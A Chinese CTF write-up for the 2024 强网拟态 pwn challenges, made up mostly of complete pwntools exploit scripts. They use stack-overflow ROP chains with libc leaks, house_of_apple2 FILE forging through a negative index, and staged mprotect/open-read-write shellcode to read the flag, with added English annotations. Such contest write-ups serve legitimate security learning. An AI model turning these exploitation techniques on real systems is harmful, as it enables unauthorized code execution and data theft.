强网拟态2024

PWN

  • signin
  • signin_revenge
  • ezcode
  • guest book
  • QWEN (复现)
  • ker (复现)

signin

在add功能中存在栈溢出, 打栈溢出就好了
随机数由于是 srand(0) 生成的，本地模拟一遍即可

#!/usr/bin/env python3
# -*-coding:utf-8 -*-
from pwn import*
from ctypes import *
from LibcSearcher import *

io_ch=1  # 1: connect to the remote challenge service; anything else runs ./pwn locally
de_bug=0  # local branch only: 1 attaches gdb to the spawned process
url='127.0.0.1'#'210.44.150.15'  # unused: the live remote() call below hard-codes its own host/port
port=9999#35942
arch='amd64'
filename='./pwn'
context(log_level = 'debug',os='linux',arch=arch)
context.terminal = ['tmux','splitw','-h']
if io_ch==1:
    #io=remote(url,port)
    io = remote("pwn-66c60f581f.challenge.xctf.org.cn", 9999, ssl=True)
else:
    #io=process(["qemu-aarch64-static","-g","1234","./pwn"])
    pass
    io=process(filename)
    if de_bug==1:
        gdb.attach(io)
if filename!='':
    # Always true with filename='./pwn'.  ./libc.so.6 must be the target's
    # libc: every libc.sym offset used later is resolved from this file.
    elf=ELF(filename)
    libc=ELF('./libc.so.6')
# - - - - - - - - - - - - - #
s   = lambda content : io.send(content)                      # raw send
sl  = lambda content : io.sendline(content)                  # send followed by a newline
sa  = lambda content,send : io.sendafter(content, send)      # wait for `content`, then send
sla = lambda content,send : io.sendlineafter(content, send)  # wait for `content`, then sendline
rc  = lambda number : io.recv(number)                        # receive up to `number` bytes
ru  = lambda content : io.recvuntil(content)                 # receive through a delimiter
rcg = lambda : u64(rc(6).ljust(8, b'\x00'))                  # 6-byte pointer -> qword (unused in this script)
# Host libc loaded through ctypes and seeded with 0, so r_l.rand() replays
# the sequence the challenge derives from srand(0) (see the text above).
# Assumes the host's rand() matches the target's libc -- confirm if the
# authentication loop in pwn_exp is rejected.
r_l = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
r_l.srand(0)
# - - - - - - - - - - - - - #
# ROP gadget addresses.  pop_rdi is an absolute address in the binary and is
# used bare (the binary is therefore assumed to be non-PIE); pop_rsi and
# pop_rdx are libc offsets that pwn_exp adds to libc.address once it is
# known.  The names state what each gadget is expected to pop -- verify
# against the actual disassembly of the binary / libc in use.
pop_rdi = 0x0000000000401893
pop_rsi = 0x2601f
pop_rdx = 0x142c92
# - - - - - - - - - - - - - #

def cmd(c):
    """Wait for the ">> " menu prompt and send choice `c` as a 4-byte LE integer."""
    sa(">> ",p32(c))
def add(idx,data=b'A',ptr=b'A'):
    """Menu option 1: create note `idx` with contents `data`, then send `ptr`
    as the second input.  `ptr` is the field the writeup identifies as the
    overflowing one; the sleep gives the service time to issue its next read."""
    cmd(1)
    sa("Index: ",p32(idx))
    sa("Note: ",data)
    sleep(0.1)
    sl(ptr)
def free(idx):
    """Menu option 2: delete note `idx` (index sent as a decimal line)."""
    cmd(2)
    sla("Index: ",str(idx))
def show(idx):
    """Menu option 4: print note `idx` (index sent as a decimal line)."""
    cmd(4)
    sla("Index: ",str(idx))
# - - - - - - - - - - - - - #
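def pwn_exp():
    """Drive the signin challenge.

    Passes the rand()-based authentication, then uses the stack overflow in
    add() in three stages: leak read@libc, enlarge the next read, and run an
    open/read/puts chain on ./flag.  Relies on the module-level io, elf,
    libc, r_l and gadget addresses.

    Fix: lines p2 and the last p4 line were indented with 3 spaces in the
    original, which is an IndentationError in Python; the body now uses a
    consistent 4-space indent.
    """
    print('PWN')
    # Opening payload: 10 NUL bytes followed by two zero dwords.
    p1 = b'\x00'*10+p32(0)*2
    s(p1)
    # The service asks for 100 authentication codes computed as rand()%100+1.
    # r_l was seeded with srand(0) at module level, so the same sequence is
    # reproduced locally; each code is sent as a little-endian qword.
    for _ in range(100):
        v = r_l.rand()%100+1
        sa("Input the authentication code:",p64(v))
    # Stage 1: 0x108 bytes of filler before the overwritten return address,
    # then puts(got[read]) to leak a libc pointer, returning to 0x4013c0
    # (an address inside the binary, presumably re-entering the vulnerable
    # read path so a second chain can be supplied -- confirm in the
    # disassembly).  The overflow travels through add()'s `ptr` input.
    p2=b'A'*0x108+p64(pop_rdi)+p64(elf.got['read'])+p64(elf.plt['puts'])+p64(0x4013c0)
    add(0,b'A',p2)
    sleep(0.1)
    ru(b'\x0a')
    # puts() prints the 6 significant bytes of the read@libc pointer.
    libc.address = u64(io.recv(6).ljust(8,b'\x00'))-libc.sym.read
    # Stage 2: set rdx to 0x300 and call read() so a chain longer than the
    # first input allows can be placed on the stack.
    p3 = b'a'*0x108+p64(pop_rdx+libc.address)+p64(0x300)+p64(libc.sym.read)
    sl(p3)
    sleep(0.1)
    # Stage 3: 0x120 bytes of filler, eight copies of 0x4013EF (presumably a
    # ret gadget used as a slide -- confirm), then:
    #   read(0, 0x404200, <rdx as left by the previous call>)  -- takes p5
    #   open(0x404200, 0, 0)
    #   read(3, 0x404700, 0x300)   -- assumes open() returned fd 3
    #   puts(0x404700)
    # 0x404200 / 0x404700 are presumably writable addresses in the binary.
    p4=b'a'*0x120+p64(0x4013EF)*8
    p4+=p64(pop_rdi)+p64(0)+p64(pop_rsi+libc.address)+p64(0x404200)+p64(libc.sym.read)
    p4+=p64(pop_rdi)+p64(0x404200)+p64(pop_rsi+libc.address)+p64(0)+p64(pop_rdx+libc.address)+p64(0x0)+p64(libc.sym.open)
    p4+=p64(pop_rdi)+p64(3)+p64(pop_rsi+libc.address)+p64(0x404700)+p64(pop_rdx+libc.address)+p64(0x300)+p64(libc.sym.read)
    p4+=p64(pop_rdi)+p64(0x404700)+p64(pop_rsi+libc.address)+p64(0)+p64(libc.sym.puts)
    sl(p4)
    pause()
    # Path consumed by the first read() of stage 3 and passed to open().
    p5=b'./flag\x00'
    sl(p5)

    #log.info('#---#---#---#---#')
    #libc=LibcSearcher("gets",gets_Addr);
    #log.success('libc.address:'+hex(libc.address))
    #log.success('elf.address:'+hex(elf.address))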
if __name__=="__main__":
    pwn_exp()
    # Hand the connection to the user once the chain has been sent.
    io.interactive()

signin_revenge

直接栈溢出了这下

比signin简化了一些, revenge?

#!/usr/bin/env python3
# -*-coding:utf-8 -*-
from pwn import*
from ctypes import *
from LibcSearcher import *

io_ch=1  # 1: connect to the remote challenge service; anything else runs ./pwn locally
de_bug=1  # local branch only: 1 attaches gdb (has no effect while io_ch==1)
url='127.0.0.1'#'210.44.150.15'  # unused: the live remote() call below hard-codes its own host/port
port=9999#35942
arch='amd64'
filename='./pwn'
context(log_level = 'debug',os='linux',arch=arch)
context.terminal = ['tmux','splitw','-h']
if io_ch==1:
    #io=remote(url,port)
    io = remote("pwn-4c5ea24842.challenge.xctf.org.cn", 9999, ssl=True)
else:
    #io=process(["qemu-aarch64-static","-g","1234","./pwn"])
    io=process(filename)
    if de_bug==1:
        gdb.attach(io)
if filename!='':
    # Always true with filename='./pwn'.  ./libc.so.6 must be the target's
    # libc: every libc.sym offset used later is resolved from this file.
    elf=ELF(filename)
    libc=ELF('./libc.so.6')

# - - - - - - - - - - - - - #
s = lambda content : io.send(content)                        # raw send
sl = lambda content : io.sendline(content)                   # send followed by a newline
sa = lambda content,send : io.sendafter(content, send)       # wait for `content`, then send
sla = lambda content,send : io.sendlineafter(content, send)  # wait for `content`, then sendline
rc = lambda number : io.recv(number)                         # receive up to `number` bytes
ru = lambda content : io.recvuntil(content)                  # receive through a delimiter
rcg = lambda : u64(rc(6).ljust(8, b'\x00'))                  # 6-byte pointer -> qword (unused in this script)
# Host libc via ctypes, seeded with 0.  Carried over from the signin script;
# r_l is not used anywhere in this one.
r_l = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
r_l.srand(0)
# - - - - - - - - - - - - - #
# ROP gadget addresses.  pop_rdi is an absolute address in the binary and is
# used bare (non-PIE assumed); pop_rsi and pop_rdx are libc offsets that
# pwn_exp adds to libc.address.  Verify each against the actual disassembly.
pop_rdi = 0x0000000000401393
pop_rsi = 0x2601f
pop_rdx = 0x142c92
# - - - - - - - - - - - - - #

# - - - - - - - - - - - - - #

def pwn_exp():
    """Drive signin_revenge.

    The overflow is reachable directly after the banner; the rest is the
    same three-stage chain as signin: leak read@libc, enlarge the next
    read, then open/read/puts on /flag.  Relies on the module-level io,
    elf, libc and gadget addresses.
    """
    print('PWN')
    ru("lets move and pwn!")
    # Stage 1: 0x108 bytes of filler, puts(got[read]) to leak a libc
    # pointer, then return to 0x4012c0 (an address inside the binary,
    # presumably the vulnerable read again -- confirm in the disassembly).
    p2=b'A'*0x108+p64(pop_rdi)+p64(elf.got['read'])+p64(elf.plt['puts'])+p64(0x4012c0)
    sl(p2)
    sleep(0.1)
    ru(b'\x0a')
    # puts() prints the 6 significant bytes of the read@libc pointer.
    libc.address = u64(io.recv(6).ljust(8,b'\x00'))-libc.sym.read
    # Stage 2: rdx=0x300, then read() so a longer chain fits.
    p3 = b'a'*0x108+p64(pop_rdx+libc.address)+p64(0x300)+p64(libc.sym.read)
    sl(p3)
    sleep(0.1)
    # Stage 3: 0x120 bytes of filler, eight copies of 0x4012EF (presumably a
    # ret slide -- confirm), then read(0, 0x404200, .) / open(0x404200, 0, 0)
    # / read(3, 0x404700, 0x300) / puts(0x404700).  Assumes open() gives fd 3.
    p4=b'a'*0x120+p64(0x4012EF)*8
    p4+=p64(pop_rdi)+p64(0)+p64(pop_rsi+libc.address)+p64(0x404200)+p64(libc.sym.read)
    p4+=p64(pop_rdi)+p64(0x404200)+p64(pop_rsi+libc.address)+p64(0)+p64(pop_rdx+libc.address)+p64(0x0)+p64(libc.sym.open)
    p4+=p64(pop_rdi)+p64(3)+p64(pop_rsi+libc.address)+p64(0x404700)+p64(pop_rdx+libc.address)+p64(0x300)+p64(libc.sym.read)
    p4+=p64(pop_rdi)+p64(0x404700)+p64(pop_rsi+libc.address)+p64(0)+p64(libc.sym.puts)
    sl(p4)
    pause()
    # Path consumed by the first read() of stage 3 (/flag here, ./flag in signin).
    p5=b'/flag\x00'
    sl(p5)

    #log.info('#---#---#---#---#')
    #libc=LibcSearcher("gets",gets_Addr);
    #log.success('libc.address:'+hex(libc.address))
    #log.success('elf.address:'+hex(elf.address))

if __name__=="__main__":
    pwn_exp()
    # Hand the connection to the user once the chain has been sent.
    io.interactive()

guest book

glibc为2.35
先是正常的泄露libc
直接利用整型溢出编辑 _IO_2_1_stdout_，打 house_of_apple2

#!/usr/bin/env python3
# -*-coding:utf-8 -*-
from pwn import*
from ctypes import *
from LibcSearcher import *
from pwncli import IO_FILE_plus_struct

io_ch=1  # 1: connect to the remote challenge service; anything else runs ./pwn locally
de_bug=1  # local branch only: 1 attaches gdb (has no effect while io_ch==1)
url='127.0.0.1'#'210.44.150.15'  # unused: the live remote() call below hard-codes its own host/port
port=9999#35942
arch='amd64'
filename='./pwn'
context(log_level = 'debug',os='linux',arch=arch)
context.terminal = ['tmux','splitw','-h']
if io_ch==1:
    #io=remote(url,port)
    io = remote("pwn-521faf0d6e.challenge.xctf.org.cn", 9999, ssl=True)
else:
    #io=process(["qemu-aarch64-static","-g","1234","./pwn"])
    io=process(filename)
    if de_bug==1:
        gdb.attach(io)
if filename!='':
    # Always true with filename='./pwn'.  ./libc.so.6 must be the target's
    # glibc 2.35 build: the libc.sym values below are resolved from it.
    elf=ELF(filename)
    libc=ELF('./libc.so.6')

# - - - - - - - - - - - - - #
s = lambda content : io.send(content)                        # raw send (unused in this script)
sl = lambda content : io.sendline(content)                   # send followed by a newline
sa = lambda content,send : io.sendafter(content, send)       # wait for `content`, then send
sla = lambda content,send : io.sendlineafter(content, send)  # wait for `content`, then sendline
rc = lambda number : io.recv(number)                         # receive up to `number` bytes
ru = lambda content : io.recvuntil(content)                  # receive through a delimiter
rcg = lambda : u64(rc(6).ljust(8, b'\x00'))                  # 6-byte pointer -> qword (unused in this script)
# Host libc via ctypes, seeded with 0.  Carried over from the signin script;
# r_l is not used anywhere in this one.
r_l = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
r_l.srand(0)
# - - - - - - - - - - - - - #

# - - - - - - - - - - - - - #
def cmd(c):
    """Wait for the end of the menu ("[+] 5.exit") and send choice `c` as a decimal line."""
    sla("[+] 5.exit",str(c))
def add(idx,size):
    """Menu option 1: allocate entry `idx` with `size` bytes."""
    cmd(1)
    sla("index",str(idx))
    sla("size",str(size))
def edit(idx,data):
    """Menu option 2: overwrite entry `idx` with the raw bytes `data`.

    The index is sent as text, so negative values such as -8 pass through;
    the writeup relies on that index not being range-checked by the service.
    """
    cmd(2)
    sla("index",str(idx))
    sa("content",data)
def free(idx):
    """Menu option 3: release entry `idx`."""
    cmd(3)
    sla("index",str(idx))
def show(idx):
    """Menu option 4: print entry `idx`."""
    cmd(4)
    sla("index",str(idx))
# - - - - - - - - - - - - - #

def pwn_exp():
    """Drive the guest book challenge.

    Leaks a libc pointer and a heap pointer by showing a freed 0x500 entry,
    then writes a forged _IO_FILE over _IO_2_1_stdout_ through an
    out-of-range edit index (house of apple2 layout, per the writeup).
    Relies on the module-level io and libc.
    """
    print('PWN')
    # Two large allocations, free the first, allocate something larger, then
    # show the freed entry: its first bytes now hold a libc pointer (entry 0
    # is still readable after free, so show() prints stale chunk metadata).
    add(0,0x500)
    add(1,0x500)
    free(0)
    add(2,0x520)
    show(0)
    ru(b'\x0a')
    # The two absolute constants cancel to a fixed offset: this is
    # leak - 0x21b110, the distance of the leaked pointer from the libc base
    # presumably recorded in the author's debugging session.  Valid only for
    # the libc build shipped with the challenge.
    libc.address = u64(io.recv(6).ljust(8,b'\x00'))-0x7d479881b110+0x7d4798600000
    # Overwrite the first 0x10 bytes so show() prints past them and exposes
    # the following heap pointer; +1312 (0x520) rebases it to the heap
    # address later used as the FILE's _lock.
    edit(0,b'A'*0x10)
    show(0)
    ru(b'A'*0x10)
    heap_1 = u64(io.recv(6).ljust(8,b'\x00'))+1312
    add(12,0x510)
    # Forged FILE.  flags and _IO_read_ptr together hold the bytes
    # "\x11\x11;/bin/sh\0"; chain points at system, the vtable at
    # _IO_wfile_jumps, and _codecvt/_wide_data back into stdout itself so
    # the struct doubles as its own wide-data area (author's A / A+0xe0
    # notes below).
    fake_io = IO_FILE_plus_struct()
    fake_io.flags = 0x2f6e69622f3b1111
    fake_io._IO_read_ptr = 0x6873
    fake_io._IO_write_base = 0
    fake_io._IO_write_ptr = 1
    fake_io.chain = libc.sym['system']
    fake_io.vtable = libc.sym['_IO_wfile_jumps']
    fake_io._codecvt = libc.sym['_IO_2_1_stdout_']#_wide_data->_wide_vtable A+0xe0
    fake_io._wide_data = libc.sym['_IO_2_1_stdout_']-0x48 # A
    fake_io._lock = heap_1
    p = bytes(fake_io)
    print(len(p))  # debug: size of the serialized struct
    # Index -8 is outside the entry table; per the writeup the unchecked
    # index makes this edit land on _IO_2_1_stdout_.
    edit(-8,p)

    #log.info('#---#---#---#---#')
    #libc=LibcSearcher("gets",gets_Addr);
    #log.success('libc.address:'+hex(libc.address))
    #log.success('elf.address:'+hex(elf.address))

if __name__=="__main__":
    pwn_exp()
    # Hand the connection to the user once the forged FILE has been written.
    io.interactive()

ezcode

主要shellcode比较难搓
最初一直计划将dx改大,但是拼尽全力无法战胜
然后发现如果第二次只写入 7 个字节，就可以利用 jmp 跳回去，修改已经执行过的区域后再次执行

#!/usr/bin/env python3
# -*-coding:utf-8 -*-
from pwn import*
from ctypes import *
from LibcSearcher import *
from pwncli import IO_FILE_plus_struct

io_ch=1  # 1: connect to the remote challenge service; anything else runs ./pwn locally
de_bug=1  # local branch only: 1 attaches gdb (has no effect while io_ch==1)
url='127.0.0.1'#'210.44.150.15'  # unused: the live remote() call below hard-codes its own host/port
port=9999#35942
arch='amd64'
filename='./pwn'
context(log_level = 'debug',os='linux',arch=arch)
context.terminal = ['tmux','splitw','-h']
if io_ch==1:
    #io=remote(url,port)
    # NOTE(review): the connection object is never bound, so `io` is
    # undefined on this branch and every io.* helper below raises NameError.
    # The other scripts on this page spell this `io = remote(...)`.
    remote("pwn-04c8177097.challenge.xctf.org.cn", 9999, ssl=True)
else:
    #io=process(["qemu-aarch64-static","-g","1234","./pwn"])
    io=process(filename)
    if de_bug==1:
        gdb.attach(io)
if filename!='':
    # Always true with filename='./pwn'.  Neither elf nor libc is used by
    # this script's pwn_exp; the files must still exist for ELF() to load.
    elf=ELF(filename)
    libc=ELF('./libc.so.6')

# - - - - - - - - - - - - - #
s = lambda content : io.send(content)                        # raw send (unused in this script)
sl = lambda content : io.sendline(content)                   # send followed by a newline
sa = lambda content,send : io.sendafter(content, send)       # wait for `content`, then send
sla = lambda content,send : io.sendlineafter(content, send)  # wait for `content`, then sendline
rc = lambda number : io.recv(number)                         # receive up to `number` bytes
ru = lambda content : io.recvuntil(content)                  # receive through a delimiter
rcg = lambda : u64(rc(6).ljust(8, b'\x00'))                  # 6-byte pointer -> qword (unused in this script)
# Host libc via ctypes, seeded with 0.  Carried over from the signin script;
# r_l is not used anywhere in this one.
r_l = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
r_l.srand(0)
# - - - - - - - - - - - - - #

# - - - - - - - - - - - - - #
# Stage 0, uploaded hex-encoded inside the JSON body (pwn_exp pads it with
# NOPs to 0x16 bytes).  Only the low 16 bits of rax/rdx are set: syscall 10
# (mprotect) on the region at r15 with prot 7, then a loop of syscall 0
# (read) with edi=0, esi=ecx and rdx still 7.  The four instructions before
# `jmp $-8` encode to 8 bytes, so the jump lands on the preceding syscall.
# The read destination comes from ecx -- presumably the post-syscall return
# address, i.e. the code right after the syscall, which is the
# "overwrite already-executed bytes and re-run them" trick the text above
# describes.  r15/ecx/ebx contents are assumed from the challenge binary.
shellcode = '''
mov dx,7
mov ax,10
mov rdi,r15
syscall
mov esi,ecx
xor eax,eax
xor edi,edi
jmp $-8
'''
# Stage 1: 6 bytes of code (edx=ebx, then syscall 0 / read again); with the
# newline sendline() appends it is the 7-byte second write from the text.
s1 = '''
mov edx,ebx
xor eax,eax
syscall
'''

# Stage 2: open(rsi, 0, 0), read(3, r15+0x500, 0x100), write(1, <same
# rsi/rdx>).  pwn_exp prefixes the buffer with the path "flag\0", so rsi is
# expected to point at that buffer on entry; assumes open() returns fd 3.
orw = '''
mov rdi,rsi
xor rsi,rsi
xor rdx,rdx
mov rax,2
syscall
mov rdi,3
mov rsi,r15
add rsi,0x500
mov rdx,0x100
mov rax,0
syscall
mov rdi,1
mov rax,1
syscall
'''
# - - - - - - - - - - - - - #

def pwn_exp():
    """Drive ezcode.

    Uploads stage 0 as a hex string in a JSON line, waits for "loaded!",
    then feeds stage 1 (7 bytes including the newline) and the
    open/read/write stage 2 over the same connection.  Relies on the
    module-level io and the shellcode strings above.
    """
    print('PWN')
    # Assemble stage 0 and NOP-pad it to 0x16 bytes.
    shell_code = asm(shellcode).ljust(0x16,b'\x90')
    payload = b'{"shellcode":"'+(shell_code.hex()).encode()+b'"}'
    sl(payload)
    ru("loaded!")
    # 6 bytes of code; sendline's trailing newline makes it the 7th byte.
    p = asm(s1)
    sl(p)
    pause()
    # Path first, code after it: stage 2 reads the path from rsi.
    orw_ = b'flag\x00'+asm(orw)
    sl(orw_)


    #log.info('#---#---#---#---#')
    #libc=LibcSearcher("gets",gets_Addr);
    #log.success('libc.address:'+hex(libc.address))
    #log.success('elf.address:'+hex(elf.address))

if __name__=="__main__":
    pwn_exp()
    # Hand the connection to the user once all stages have been sent.
    io.interactive()